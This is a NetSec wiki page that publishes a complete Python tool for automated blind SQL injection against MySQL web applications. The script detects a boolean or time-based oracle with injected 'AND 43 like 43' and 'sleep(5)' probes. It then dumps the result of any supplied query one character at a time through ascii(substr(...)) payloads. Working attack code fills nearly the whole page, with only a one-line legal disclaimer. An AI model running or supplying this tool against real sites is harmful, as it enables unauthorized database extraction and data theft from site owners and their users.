
SQL injection/mysqli-blindutils/sqli-slee.py

From NetSec
Revision as of 16:31, 22 September 2012 by MinnaMichalik (Talk | contribs)

This script uses time- and boolean-based blind SQL injection to obtain the desired information from a MySQL database.

Info

The syntax of this script is:

 python bsqli.py -u [url] -i [injection]

Example

 python bsqli.py -u "http://target.com/?id=1%27" -i "select database()"

Disclaimer

The end user is liable for his or her own actions with the use of this software. Running this against a system you do not own without written authorization is a criminal act.

Source

 
#!/usr/bin/python
 
import sys,re,urllib,urllib2,string,time
from optparse import OptionParser
from urllib2 import Request,urlopen,URLError,HTTPError
 
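def request(URL):
  """Fetch URL with a fixed browser User-Agent and return the body length in bytes.

  URL -- the complete URL to GET; it is sent exactly as given, so the caller
         is responsible for any percent-encoding.

  Returns the integer length of the response body.  On an HTTP error status
  or a failed connection the error is printed and the process exits with
  status 1; callers never see an exception from this function.
  """
  # Every request carries this same hard-coded User-Agent header.
  user_agent = { 'User-Agent' : 'Mozilla/5.0 (Macintosh; Intel Mac OS X 10_7_3) AppleWebKit/534.55.3 (KHTML, like Gecko) Version/5.1.3 Safari/534.53.10' }
  req = urllib2.Request(URL, None, user_agent)

  # `as e` replaces the Python-2-only `except X, e:` form; HTTPError is a
  # subclass of URLError, so it must stay first to report the status code.
  try:
    response = urllib2.urlopen(req)

  except HTTPError as e:
    print('[!] The server couldnt fulfill the request.')
    print('[!] Error code: ' + str(e.code))
    sys.exit(1)

  except URLError as e:
    print('[!] We failed to reach a server.')
    print('[!] Reason: ' + str(e.reason))
    sys.exit(1)

  # Read the whole body, then close the connection explicitly: this function
  # is called once per probe from a loop, and the original left each response
  # object open until garbage collection.
  try:
    body = response.read()
  finally:
    response.close()

  return len(body)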
 
def value(URL):
  # Recover one character by binary search over the byte range 0..255.
  # URL already ends in the ascii(substr(...)) expression built by main();
  # is_what() appends the comparison operator and the candidate value.
  # Each round asks is_what(), in order, whether the true value is above,
  # below or equal to `maybe`, narrowing [floor, ceiling] around it.
  # Returns chr(value) on an '=' hit, or the sentinel string 'done' once
  # 9 rounds have passed without one; main() stops dumping on 'done'.
  # NOTE(review): 'done' is therefore also what the caller receives when
  # no probe ever matches (every is_what() call returning 0), so "end of
  # data" and an inconclusive search are indistinguishable in main().
  target = 0  # never read
  end = 0  # round counter; the loop is capped at 9 rounds
  next_maybe = 0
  floor = 0  # lower bound of the candidate range
  ceiling = 255  # upper bound of the candidate range
  maybe = int(ceiling)/2  # 127: this file is Python 2 syntax, where `/` on ints truncates
 
  while(end != 9):
    if(is_what(URL, maybe, '>')):	
      # True value is above `maybe`: raise the floor, probe the upper half.
      floor = maybe
      next_maybe = int(maybe + ((ceiling - floor)/2))
 
    elif(is_what(URL, maybe, '<')):
      # True value is below `maybe`: lower the ceiling, probe the lower half.
      ceiling = maybe
      next_maybe = int(maybe - ((ceiling - floor)/2))
 
    elif(is_what(URL, maybe, '=')):
      return chr(maybe)
 
    # When none of the three probes matched, next_maybe keeps the value it
    # had from the previous round (initially 0).
    maybe = next_maybe
    end += 1
 
  return 'done'
 
def is_what(URL, maybe, op):
  # Ask the target whether the injected value compares true to `maybe`
  # under `op` ('>', '<' or '=').  Depends on two module globals:
  # sqli_type (set in main() from vuln_check()) selects the oracle, and
  # TrueResponse (set in vuln_check()) is the body length of a known-true
  # probe.  Returns 1 when the condition held and 0 when it did not; falls
  # off the end (None) if sqli_type is neither 'boolean' nor 'time'.
  if(sqli_type == 'boolean'):
    # Boolean oracle: the condition held if this probe's page length equals
    # the known-true length.  request() already reduces the body to len().
    ValueResponse = int(request(str(URL) + str(op) + str(maybe) + '--+'))
    if(TrueResponse == ValueResponse):
      return 1
    else:
      return 0
  elif(sqli_type == 'time'):
    # Timing oracle: ')*2)' closes the 'sleep((' that main() leaves open, so
    # the injected sleep() argument is (comparison)*2, i.e. 0 or 2 seconds;
    # any round trip over 2 seconds of wall-clock time counts as true.
    # NOTE(review): the measurement includes network latency, so a slow
    # link can turn a 0-second sleep into a false 1.
    start = time.time()
    ValueResonse = request(str(URL) + str(op) + str(maybe) + ')*2)--+')  # length unused (and the name is misspelled)
    elapsed_time = (time.time() - start)
    if (elapsed_time > 2):
      return 1
    else:
      return 0
 
def vuln_check(URL):
  # Decide which blind-injection oracle the target exposes and return its
  # name, 'boolean' or 'time'.  Side effect: sets the module global
  # TrueResponse (body length of the known-true probe) for is_what().
  # Exits the process with status 1 when neither probe behaves as expected;
  # request() itself also exits on an HTTP error status, so a server error
  # triggered by any of these probes ends the run here.
  print('[+] Checking site...')
 
  global TrueResponse
  # Two probes that differ only in a true (43 like 43) versus false
  # (34 like 43) condition; request() returns the body length of each.
  TrueResponse = int(request(URL + '%20AND%2043%20like%2043--+'))
  FalseResponse = int(request(URL + '%20AND%2034%20like%2043--+'))
 
  if(TrueResponse != FalseResponse):
    # Different page sizes for true and false: the boolean oracle is usable.
    print('[+] Site seems to be vulnerable to boolean based blind SQL injection.')
    return 'boolean'
  else:
    # Same size either way: time a single sleep(5) probe instead.
    start = time.time()
    SleepResponse = request(URL + '%20and%20sleep(5)--+')  # length unused
    elapsed_time = (time.time() - start)
 
    if(elapsed_time > 5):
      # NOTE(review): a single sample against a 5-second threshold; an
      # unrelated slow response is reported the same way.
      print('[+] Site seems to be vulnerable to time based blind SQL injection.') 
      return 'time'
    else:
      print('[!] Seems like site isnt vulnerable to blind SQL injection.')
      sys.exit(1)
 
def main():
  # Script entry point: parse -u (target URL, injection point included) and
  # -i (the SQL expression to evaluate), pick an oracle via vuln_check(),
  # then recover the expression's result one character at a time with
  # value() until it returns 'done'.
  print('''
        Auto BSQLi tool for MySQL
        ''')
 
  usage = 'usage: %prog -u <target> -i <injection>'
  parser = OptionParser(usage=usage)
  parser.add_option("-u", action="store", type="string", dest="URL", help='"http://site.tld/index.php?id=1%27"')
  parser.add_option('-i', action='store', type='string', dest='INJECTION', help='"select version()"')
 
  (options, args) = parser.parse_args()
  if(options.URL and options.INJECTION):
    URL = options.URL  # used verbatim; the -u help text shows it already percent-encoded (id=1%27)
    INJECTION = urllib2.quote(options.INJECTION.encode("utf8"))  # percent-encoded for the query string
  else:
    print('[!] Missing url or injection parameter.')
    print('[!] Use --help.')
    sys.exit(1)
 
  global sqli_type  # read by is_what() to choose its oracle
  sqli_type = vuln_check(URL)  # exits the process if no oracle is found
  position = 1  # 1-based offset for substr()
  dump = ''
  print('[+] Dumping data...')
 
  while(1):
    # Both branches wrap INJECTION in ascii(substr((...) from position for 1));
    # value() and is_what() append the comparison and the '--+' terminator.
    # The time branch deliberately leaves 'sleep((' open: is_what() closes it
    # with ')*2)' so the server sleeps 0 or 2 seconds per probe.
    if(sqli_type == 'boolean'):
      letter = value(URL + '%20and%20ascii(substr((' + INJECTION + ')%20from%20' + str(position) + '%20for%201))')
    elif(sqli_type == 'time'):
      letter = value(URL + '%20and%20sleep((select%20ascii(substr((' + INJECTION + ')%20from%20' + str(position) + '%20for%201))')
 
    if(letter == 'done'):
      break  # value() ran out of search rounds; treated as end of data
 
    dump = dump + letter
    position += 1
 
  if(dump):
    print('[+] Data: ' + dump)
  else:
    print('[!] No data dumped. Check your injection.')
 
if __name__ == "__main__":
  # Run main() only when executed as a script, not when imported.
  main()